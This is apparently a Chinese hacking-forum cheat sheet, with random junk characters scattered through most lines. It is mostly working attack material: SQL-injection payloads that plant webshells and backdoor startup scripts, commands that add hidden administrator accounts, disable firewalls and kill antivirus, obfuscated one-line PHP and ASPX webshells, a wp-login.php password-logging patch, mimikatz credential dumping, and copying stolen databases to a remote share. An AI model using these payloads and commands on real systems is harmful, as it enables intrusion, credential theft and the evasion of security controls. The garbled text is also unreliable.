insert into a values ("set wshshell=createobject (""wscript.shell"") " );% I* w3 {# L. M) c1 c
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
/ Q& F5 O6 m9 [insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );5 f% H/ q4 U8 h0 s
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";/ e8 s/ } ^$ }: g7 a5 u: d
drop table a;
: K1 R3 U) @9 I# |3 s9 A8 h% l' @+ E) R5 s+ E* a* V
英文版本:
+ ]- V+ {: ^# S' V5 P4 q: R6 r. @& m; a
use test;- w# |) J k' [) ~& T- ~+ s
create table a (cmd text);
1 ^, E/ g6 S. F" Zinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
$ f" {: c H! q& y3 Linsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) }/ L0 A e; }insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
- r7 b) h& c: u- i0 i$ F, J4 Zselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
9 f J$ t- J* [9 Bdrop table a;
) x2 W1 W# V9 Z
. X* }' x# b1 P# l1 f1 Z, v# B0 tcreate table a (cmd BLOB);
7 N, V' I2 b% \* Jinsert into a values (CONVERT(木马的16进制代码,CHAR));, q8 Y" n, f7 q: D. |' y
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'" S# Z: d! r( _& G2 a( \2 F
drop table a; [+ a; m, @6 T- K1 {& o
( t7 ^ n) K6 u0 D1 K
记录一下怎么处理变态诺顿
- c9 Y6 B+ X1 g# I+ J6 Q查看诺顿服务的路径
8 ^$ ]& V- L; z* I) Rsc qc ccSetMgr2 _* i& j& \4 d% N2 h
然后设置权限拒绝访问。做绝一点。。* |0 i: ]; l7 a8 B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system: |' o( z; ?/ ?9 {5 t& O& M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"! }2 ^4 @: H H" N J5 z9 ` D' s
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators3 y8 A1 Y7 ~( x0 U' ]. J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone$ a4 Q7 y; j `9 [& f+ ~% w
1 j# W: {4 e2 G# }& ~) Z2 Z- a* Y( U然后再重启服务器
+ ^8 P$ s2 P+ aiisreset /reboot
) F8 n0 M! R. t4 Q, i这样就搞定了。。不过完事后。记得恢复权限。。。。
* d1 H6 i( S9 j3 o# h$ v2 ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F7 K! J3 a: u( m4 R9 U6 L" v& f
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
. }3 f( H" K; m u" O$ Q6 [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F# G6 o% G: t0 ^ F: Q9 P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
) k- ^' R! K6 M0 U" D+ ?SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
; Q9 x& y1 t' X [9 K
- H7 K8 }* W0 _) k+ OEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')* ~6 f( W# k3 i/ \
! }7 G# j& Q( T) f; C
postgresql注射的一些东西
4 L- v, W9 N6 M* {- R如何获得webshell
& c- @. W; s6 C% Y; Z Ahttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
8 g Q/ n- p6 S$ t1 lhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
: n: @4 W$ k. L* ?- chttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;: i- \: R# P: ~4 b6 r/ e' \& @
如何读文件
- J# ?8 T7 S* o0 G+ v+ h4 Xhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);7 x4 ^0 f# V5 ?8 U& ], m
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;8 U, U! P8 X3 W2 i% U9 g* n( K! Q
http://127.0.0.1/postgresql.php?id=1;select * from myfile;$ R# g" A. N$ g. Q8 Q
# J( p! U* S0 m+ Q4 j, Z( @
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。% F. d3 I* t# \0 }7 h) E
当然,这些的postgresql的数据库版本必须大于8.X
( w+ J, I: c3 F6 t# I创建一个system的函数:
; |* j4 ]- y: _7 X- T% I& P, }CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT6 H3 I2 C8 V) n, W/ u- m/ F4 A
! F* x2 h$ Q& I9 K; B: G
创建一个输出表:, ^1 R; R$ j7 P! O5 j+ N
CREATE TABLE stdout(id serial, system_out text): d5 f4 K9 ~( j1 W0 X4 R( w
1 O Y( v I* E) ^2 f1 S执行shell,输出到输出表内:
* } v z1 F4 d9 B" ~SELECT system('uname -a > /tmp/test')
, h' [4 n6 ~3 A4 V* M9 P9 G
: H& J/ o, ?4 B8 Pcopy 输出的内容到表里面;, X* _2 [" Z0 E
COPY stdout(system_out) FROM '/tmp/test'6 C1 O, D# s6 h, S
" _/ E- o3 L; j: g8 _
从输出表内读取执行后的回显,判断是否执行成功
0 n$ F I" d2 N( e) \$ |! x' [, e' v2 L& _+ r( |% y# O; H2 `
SELECT system_out FROM stdout. N" ^9 Y0 O% ]. C2 p! Q
下面是测试例子
; _& Y3 E9 E3 C: M
3 U2 g0 I4 X* c: ^3 D* p/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
% b# o% E0 _/ w# N# s6 P$ P* `/ s! U" Y. N7 d9 e" H5 R" C
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
8 T8 U/ a' W0 _8 c4 {& aSTRICT --
0 y1 b1 K7 s0 n5 |+ j- q. Y
) W* V. B3 {, z3 H% b8 }/store.php?id=1; SELECT system('uname -a > /tmp/test') --
9 F0 X( R! C' O( i: e# D
! E$ _: ~2 W& r/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
8 g9 p9 K) L4 j6 q1 K" H | j/ l. A0 M% ~
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--+ z# L6 f& N+ _( y7 d& r
net stop sharedaccess stop the default firewall
' I8 o: t% s$ }netsh firewall show show/config default firewall% [7 t6 f! w7 e
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
/ |# {3 x. s {( S$ Cnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
{8 f* o0 q- O; G/ O, e修改3389端口方法(修改后不易被扫出)
c4 T- }3 f5 z1 D修改服务器端的端口设置,注册表有2个地方需要修改% I, K; ^4 u5 v* H% a" e1 U1 r, {
5 W P) X! c; f5 T9 P/ _; Q
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]# s" v1 x* O# Q# X" y$ K
PortNumber值,默认是3389,修改成所希望的端口,比如6000
* L2 X9 d5 a( H5 Z6 ~
8 y, ~- l# i7 E& X: N) s2 `第二个地方:1 H$ b5 z3 [% N
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
# i- X. a) S$ O! V# u( pPortNumber值,默认是3389,修改成所希望的端口,比如60006 j* ^9 ?+ s* p W3 C
+ a7 W- P7 y' Y% K! I现在这样就可以了。重启系统就可以了
; y+ y2 f! j+ l8 X7 r
3 ^" p) Q7 @% R# k查看3389远程登录的脚本
7 s2 _( y* \; S保存为一个bat文件/ @. E* i; U+ x5 O" N4 N$ ^
date /t >>D:\sec\TSlog\ts.log
9 [3 z8 A- R/ i1 m0 Jtime /t >>D:\sec\TSlog\ts.log# ^% I4 J7 N% p6 h
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log- M$ B( f ?+ A1 |9 z3 r
start Explorer
|; U3 G' k2 }1 ?- _" M& C* H7 V* b/ w4 ^& C
mstsc的参数:. |0 n2 ^/ _$ s' }
$ @4 y0 g/ o4 U' w1 q/ Y8 _2 @
远程桌面连接0 g4 J+ n3 N) W3 T: G2 U+ K8 L' [
! r0 L& C4 a8 E3 w6 ~
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]( Q8 h& G5 ^# g5 n
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?- k4 i% @' j# |; y9 _% z8 V" [
' d: w! `1 S7 J& _" o<Connection File> -- 指定连接的 .rdp 文件的名称。# |; q. T/ _* V2 ~( |+ R! D
0 N4 U: h# s5 k* M, _- h5 P/v:<server[:port]> -- 指定要连接到的终端服务器。( [. C% w% ]1 L& `
! x1 A# |* {' x& l* |0 ~
/console -- 连接到服务器的控制台会话。/ \- P; U/ _1 E( g; \2 b# u
$ U% ^8 E6 I7 d% B, L T/f -- 以全屏模式启动客户端。
4 V- A3 T- W& {1 p2 a
- W2 Q* h3 D0 k/ g1 n8 ]/w:<width> -- 指定远程桌面屏幕的宽度。' |7 s3 ~5 S# W' k( B$ ~- R" k8 m
% Z) N1 |5 \8 M, U# ?% q
/h:<height> -- 指定远程桌面屏幕的高度。; Q7 F( ]6 T( z; \& l
5 M# m3 l8 N7 k! r5 {% B/edit -- 打开指定的 .rdp 文件来编辑。
/ \3 |5 c' q) T/ H( T8 W) _! q+ d, T) @
/migrate -- 将客户端连接管理器创建的旧版% \/ d+ u0 b7 X! v3 }7 ^/ b; A
连接文件迁移到新的 .rdp 连接文件。) A3 S6 H2 B m* m* e p5 A
; K# ^( g% b8 M+ B/ }( ^2 V1 H, Q9 O3 |6 C$ H
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就+ `+ j- @* r2 `7 _; z* n/ `
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
+ R @: ^9 C/ H( @& E: F& Q6 l" Z4 S
命令行下开启33896 g' p: ^5 K! H( i" Y9 O& M: _
net user asp.net aspnet /add5 v! u9 m: B; S2 a' |
net localgroup Administrators asp.net /add0 F$ H, A: r) P7 i" z) x
net localgroup "Remote Desktop Users" asp.net /add ^6 k0 z3 W+ W2 a7 i, W
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D7 A$ w) X' h; d2 `' W
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 02 q- P& h' a) Q9 _7 y! P$ }
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 15 S$ t4 V) v3 |# @
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f8 A9 U# |5 _0 ]9 N9 G z" m
sc config rasman start= auto. m' ]3 x: p' c8 ~4 o
sc config remoteaccess start= auto4 h* _6 N, z5 r# U
net start rasman# _7 A- B7 D+ u. D# A1 Q) a6 d
net start remoteaccess
$ M9 z4 q& }! }Media
8 Y+ C! n$ @; i4 J<form id="frmUpload" enctype="multipart/form-data"+ l5 N, d; p1 ~; X7 D8 }- D9 m
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br># k$ k- B* q- t* `
<input type="file" name="NewFile" size="50"><br>
, N. O. R* H: L6 [! c8 Q/ G* |! u! |<input id="btnUpload" type="submit" value="Upload">, T6 d, o: M/ K$ B/ }4 C
</form>
$ ? ~# y) \/ ~, @) P3 R R. F f! H6 ^- {: b' f5 s, c$ t5 a
control userpasswords2 查看用户的密码' F( Q( ^6 H+ ?# u; j
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
. |7 D% L( w! P* W, cSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) L9 U# P+ M" B' H# d$ }6 C8 Z7 e3 \+ C/ V" n. _) o8 q
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:# Y% _* @8 b, S2 C _
测试1:
/ I& W: P2 L/ S# h. N& QSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- i5 h4 J) H" d: W/ C8 S/ x4 O" k+ W( p a' \1 Y
测试2:/ f' p# ?% U/ W, t
, ]2 c, s& N. H6 w" {: r" P
create table dirs(paths varchar(100),paths1 varchar(100), id int)
7 e8 {- J1 K9 C' p3 H2 ^
* w7 \, T/ W' x2 b' `delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
: K5 `6 U1 R6 l$ z* u4 B, @6 i* M4 ~5 T+ u8 t9 Y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! G. h( ~+ H9 g关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
) J9 }/ q. ]. h/ J( n* h4 y/ I可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
' q' _- \& _( C4 `: anet stop mcafeeframework
6 ^, l, W9 `5 |% X* @# \ znet stop mcshield
% d Y" B. x! ?; `1 Unet stop mcafeeengineservice
' i. r1 |% _6 v9 R1 Onet stop mctaskmanager& F& U8 x" X; a/ [. _ \1 U6 x
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
" W. H) l' _+ m/ D
' D5 o6 |- I4 p VNCDump.zip (4.76 KB, 下载次数: 1)
C7 C2 `4 R( I0 A- E9 @& j密码在线破解http://tools88.com/safe/vnc.php
3 I. w5 f! V# v$ _% T R- zVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取( j* d( ]9 i6 ^5 l% T- T. G
4 T: R; F- a- R3 e [exec master..xp_cmdshell 'net user'* }2 F. e2 `* a- R
mssql执行命令。9 K9 P3 g y- a7 _0 H
获取mssql的密码hash查询
0 a1 `2 o$ p( @& A! pselect name,password from master.dbo.sysxlogins3 n- J2 E5 g* D% l- y
$ j. c1 g9 G/ Y1 N& d
backup log dbName with NO_LOG;
( s* g& D. P- n2 e' k: mbackup log dbName with TRUNCATE_ONLY;
. J, u' C* u. g, s8 V- ]! Y, a% `- sDBCC SHRINKDATABASE(dbName);: ?: [& G0 m9 j: v4 u8 u& W y3 F
mssql数据库压缩
6 y$ D" ]8 {. M3 B; @" t( D) b. d$ b7 O& o* S/ b% Q1 ]
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
7 x' l2 r3 w3 }: T将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。6 N) V( p( G/ Z5 l! L \4 v
5 r) N+ G+ L, H! a1 _' @* M
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'3 |$ \, K9 d4 {8 Q4 V
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
3 W m. _. u2 u% p* A0 k
" f* ^0 ]' k2 YDiscuz!nt35渗透要点:5 }0 E) U; R7 t3 {
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
- s' k. O# ^& d" H! J(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>" P+ I* F( G5 F% d- E9 T
(3)保存。
# X5 O7 O$ x: G: Q. w5 I(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
% p0 ~/ K2 ^- C- a4 Q( rd:\rar.exe a -r d:\1.rar d:\website\) D+ G- R# z) K- I; u' G- k
递归压缩website) e3 N. E* W9 w; w3 a! V
注意rar.exe的路径
$ {0 k* u: j: @2 F* T4 A) j4 H! V! G6 P& }/ o9 i
<?php
+ N. E* V% s4 n) }6 q' f, v0 _; z# \
$telok = "0${@eval($_POST[xxoo])}"; G% W# b' g! n- q6 x. K1 L
3 Y# ^, b N; i: V$username = "123456";
- i# A6 {3 K0 s2 m# a6 o
9 W; ^2 G- S6 q% T# n$ [! C Q, x! O$userpwd = "123456";
, e0 n4 B* p- F2 t" e0 |& |3 t0 l2 O& W' \! u6 H& ^' T
$telhao = "123456";* O K# \& d! P! j& r6 ~; \: Q
% _% D0 a: Q- |
$telinfo = "123456";, Z1 x# ?0 U. W% M' _& B
* c' Z" o. t8 q6 k9 k& s3 n. S?>6 I( M1 O. f* P& n8 C) a- T
php一句话未过滤插入一句话木马
8 D) g# J! |0 h/ E( [
1 [; H' u" N* P0 q: J$ {站库分离脱裤技巧
" m2 ?7 {2 ]% e4 X/ y$ j- K3 V, nexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'3 @3 \5 i2 g3 i' v6 j
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
! g. s9 {: A' d, P$ T5 W& G% |条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。2 ?3 u0 w% L: K3 w% M$ S
这儿利用的是马儿的专家模式(自己写代码)。
" l1 H( D8 e% }4 _: r7 iini_set('display_errors', 1);$ Y) q {, [/ d- v6 u* F+ @2 P& U
set_time_limit(0);( l' E. a! P- f1 P
error_reporting(E_ALL);& K! w9 x" Q! m( y& j
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());0 K8 `$ m" Z" L! Z, m l: D; S
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());+ k* N; v" w9 z+ k; O/ G
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());1 c7 v% l5 r3 b3 J% S3 T
$i = 0;$ Y8 I! r/ O3 @9 ^+ q
$tmp = '';9 W/ Q% g3 c. i
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {, u2 t/ U' |8 k2 w+ i
$i = $i+1;# m) z* f+ M9 E% U% V
$tmp .= implode("::", $row)."\n";" v2 b' ?4 N# Z5 e0 D+ c8 m5 F8 I
if(!($i%500)){//500条写入一个文件
5 c8 X6 z8 m* h; G7 j# |5 z. J $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';5 E" r0 n3 \& t0 l* p" [
file_put_contents($filename,$tmp);
/ R$ I% ^8 G9 N/ K; w $tmp = '';; k# L R* }( |" [2 D. [) c) j
}
1 l5 I1 ?7 q+ L* ^}! O* O3 B; y" o1 p6 H" Y
mysql_free_result($result);* i/ B& r8 Y4 C* S! G2 U, y
& l3 ^& K" N$ {$ j
' a; Z/ \& f8 I L+ k, U! P. j6 @
0 k, u2 U& H5 M, J. @" D6 Q//down完后delete
8 e2 c8 |; j& v" H. p2 b5 T2 j0 |+ H f% O. I( n3 @" r
2 b) d1 |7 S/ V& m6 m) i# T$ q( c
ini_set('display_errors', 1);
: U% H+ L' G7 z' ^/ e" Z" merror_reporting(E_ALL);
8 a) h; [: l* R' j8 ?, S" R$i = 0;
) ^6 Q, ?/ E( [, q3 K7 Q) _while($i<32) {- U) D( ]6 r$ E5 ?
$i = $i+1;6 o* }( \2 T* v3 e* v. F
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
8 A0 v5 {# a( A% ~9 j |, | unlink($filename);
3 P9 i8 u& Z5 x} 3 y' F2 b* T! ]. [6 i
httprint 收集操作系统指纹
2 P- x9 g' ]/ f! t扫描192.168.1.100的所有端口% t$ v# r. s# G+ V5 b" X
nmap –PN –sT –sV –p0-65535 192.168.1.1002 k' M& G+ C4 S1 D- L
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
7 X9 s ] |! z) a% u* D+ o# uhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输! K% w. N/ s* Z9 x6 i; }
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
4 z, r$ {+ l& F$ e2 n5 W" J' V ?/ s8 j3 \, k8 d
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
3 `% K. A1 ?8 s5 p3 y9 \6 ~
( q( x3 C9 b& R7 R9 ~ MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
; \0 V3 M( ]8 w4 b
3 k4 K1 V8 E5 y' w2 f: ]# o& D Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x1 n* M. b! H& D" I# Q- S# O- D7 [
" j% m7 x7 ~$ _
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
5 g% _6 E5 E8 ^; C8 V) }& J: F
$ I0 i2 x5 Z: `" _- M7 o# i; }* Q2 Q http://net-square.com/msnpawn/index.shtml (要求安装)
5 D7 \6 f: \! D
* t. g; ~& J' o6 M! \. f: i tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)- O p) O& @6 }, ?: ~& b# \
& x; q4 D0 ^, n3 b6 N% j3 h8 |" Y) M SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
' u- x% U/ G$ O) K, s8 V/ S. iset names gb2312
* f n0 }3 w: \! ^. a! @7 c8 a6 Z导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。* @1 O* g* J1 m+ |% _- t9 t2 T
5 |5 K/ K: @; d7 n
mysql 密码修改
~/ w, U+ c" C$ t0 OUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
) `& t& J. V. E8 x, }update user set password=PASSWORD('antian365.com') where user='root';, V0 ~. Q0 D# E" [+ E
flush privileges;4 k1 T' F7 L; v0 k' M8 i
高级的PHP一句话木马后门* C+ h! W9 G# `" I- V
8 U. d- a. {" F' J入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀. p* i- ~) `3 Z0 {3 X9 s( Z' c
6 m, V& r7 C3 f" r: P
1、
9 F: F$ l$ S% r1 N8 s0 g' @3 Z h" t
& o% D% @3 `& z4 t% Z9 {+ k$ I$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
0 u% Z2 e; N9 f/ p2 ]
6 c4 r, w1 T D' s$hh("/[discuz]/e",$_POST['h'],"Access");$ Z# R( ]0 F3 k* |- z' x
) M9 D% _- }3 h1 Z//菜刀一句话: M. Q0 l- m/ J# q% y6 @
7 X$ \: w+ ?9 ~5 G% b! C
2、 M$ v$ j3 L5 m9 @8 P
0 z# X4 n0 w0 C+ D. a8 V6 U" q
$filename=$_GET['xbid'];
! I5 t1 r I6 Q ` M5 l0 n/ \" ^( }/ o5 {! {4 L; i. H! X
include ($filename);3 ~% V3 w q* t2 G% f5 o% D
1 W# m2 X2 v) l- w% I//危险的include函数,直接编译任何文件为php格式运行
1 ]" @4 ]9 C& @5 P9 E3 m
1 L5 s4 }$ b |/ W3、* {# n1 d. h! ~- v) F7 [, Z
% l3 ]4 D% P9 C6 J: J K% R$reg="c"."o"."p"."y";
1 c+ a3 E8 l/ z `* U5 J) l
. z/ k! h& Y, {- a8 A' f% U$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
8 |1 d3 t M. F7 R o+ [
- j8 Z9 y, y% `# J//重命名任何文件
7 ?: w5 e: z" F( B
1 Q7 J2 I$ w7 n7 u; P) \/ V4、1 j- g/ @7 l. O0 z
1 l( B, r. I. w' d. t2 R/ @! |) A* Q4 S$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
1 \7 }0 Q+ ?: y# z: r0 K$ a- U, r- c& c! H; [2 T- r
$gzid("/[discuz]/e",$_POST['h'],"Access");
* |7 M( Q E0 R2 ]4 h; Y7 b7 m2 `& q
//菜刀一句话2 h) F8 t0 C+ E6 I+ v
1 Q3 d+ i& n. @. u
5、include ($uid);
1 P/ l. m$ k0 V8 Z: ~# {6 `! I! ^$ |; C8 P
//危险的include函数,直接编译任何文件为php格式运行,POST
1 q+ F1 t7 K# l. W/ i4 [* ?6 _; R0 x: E" M) d' e& W: ]/ v+ E
: e f3 R3 o6 ~/ u9 p& E
//gif插一句话. W4 t$ l& P6 ~2 L. C
; ^1 ~0 j w; k6 f0 ~. N6、典型一句话
3 l$ D, |4 O5 K9 C/ U; g6 F, f- |2 E5 v
程序后门代码
2 F1 g; a6 b8 J$ d( b<?php eval_r($_POST[sb])?>
+ P1 h$ {; `: c9 T2 n( v程序代码. R& j" k8 t0 I" T0 p1 I
<?php @eval_r($_POST[sb])?>
: ^! x, h% P; F: e//容错代码
. D% g9 p3 Y) a% f程序代码. x& X4 [- v. G
<?php assert($_POST[sb]);?> K! N% g( j5 {
//使用lanker一句话客户端的专家模式执行相关的php语句
, X+ f" C* l0 A8 o程序代码; I8 H$ T# ~8 Y1 z2 r) ?1 j+ |$ s! H T5 M
<?$_POST['sa']($_POST['sb']);?>: J* N p d4 Q
程序代码
7 z u- E% v$ U5 K: @/ I0 M y% ^/ L<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>4 g1 l) `1 A* V3 z
程序代码& k9 u! X. E f, r
<?php2 o' j6 H# G- _8 {( E
@preg_replace("/[email]/e",$_POST['h'],"error");( `% X1 i) n0 m
?>! a! f& _! E7 s, M6 K
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入5 f- g" x7 z# G5 i* }
程序代码
. i! H8 F0 s) ~ F+ l% s& ^* u. q' j<O>h=@eval_r($_POST[c]);</O>
, c: K9 w& f3 A$ ~3 o L程序代码* Q ?) e& p* n- t' L; M4 Y
<script language="php">@eval_r($_POST[sb])</script>
8 b9 J! \9 U5 @3 s//绕过<?限制的一句话
* S, l& Y0 T% Y3 E
9 C1 l3 n9 d% B% phttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip0 O& M8 [" ]) o- _3 |" j( K
详细用法:( A3 Y( u8 j8 a3 z! i. o
1、到tools目录。psexec \\127.0.0.1 cmd$ }2 ~. [+ w6 z5 O( U3 y- n. X/ t
2、执行mimikatz a# l) c2 v; y* P4 z/ @
3、执行 privilege::debug
, e9 u1 Y$ d- d2 V0 G% X4、执行 inject::process lsass.exe sekurlsa.dll( G6 c/ ~& `) J; @, ]! T; I
5、执行@getLogonPasswords; z# J8 Y' G9 x I& T- d
6、widget就是密码/ Z) }" T; E* ?/ Y. g; W
7、exit退出,不要直接关闭否则系统会崩溃。
# y& d- P/ o/ Y9 Y3 |
8 A* V z/ Q. A5 J9 Nhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面/ X# A1 v9 [8 {3 z0 h( x
* y' U' M& ^- V( Z9 @
自动查找系统高危补丁" Z* N2 [4 a/ G) ~
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt$ v/ A2 G% b4 t. |! w/ Y; F7 s5 Q
& o6 \0 s/ }) F C4 I8 f: w$ e突破安全狗的一句话aspx后门
4 x, T% k+ k: V; m<%@ Page Language="C#" ValidateRequest="false" %>& ~* L ^/ Z# ?! {4 o
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
8 ^ u2 x. q( r5 W/ ewebshell下记录WordPress登陆密码
$ d1 K3 I) d y2 w) |# y/ p3 k$ t3 ]webshell下记录Wordpress登陆密码方便进一步社工9 x+ K; }( b8 W' R0 q6 g7 z. }
在文件wp-login.php中539行处添加:
( S. F* l( D' r: W4 t2 v// log password0 E5 e# O4 n: o
$log_user=$_POST['log'];4 R' b* `. l3 p% G5 \2 ?
$log_pwd=$_POST['pwd'];% ~1 b. Y; p* a) m) x. w- C
$log_ip=$_SERVER["REMOTE_ADDR"];
* V/ Z% o; G: n3 J$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;: G( J9 G* Y. X2 X0 n" H4 L) x9 p
$txt=$txt.”\r\n”;$ D ]5 j* F0 V7 h
if($log_user&&$log_pwd&&$log_ip){& g: i9 a) Z/ t$ O2 y7 X3 x
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);* {( W$ ~! l' c$ O7 ]
}) Z( V ]* Z" ]1 f
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。" `2 ]( k& N" J. \/ y/ H- `4 ]
就是搜索case ‘login’; T2 V5 F O: m S
在它下面直接插入即可,记录的密码生成在pwd.txt中,
& |& {" j7 D5 w: z其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录9 x( ~, g, E4 w4 d1 J' L9 M }4 E k
利用II6文件解析漏洞绕过安全狗代码:
8 ]- g$ H' Q! w;antian365.asp;antian365.jpg
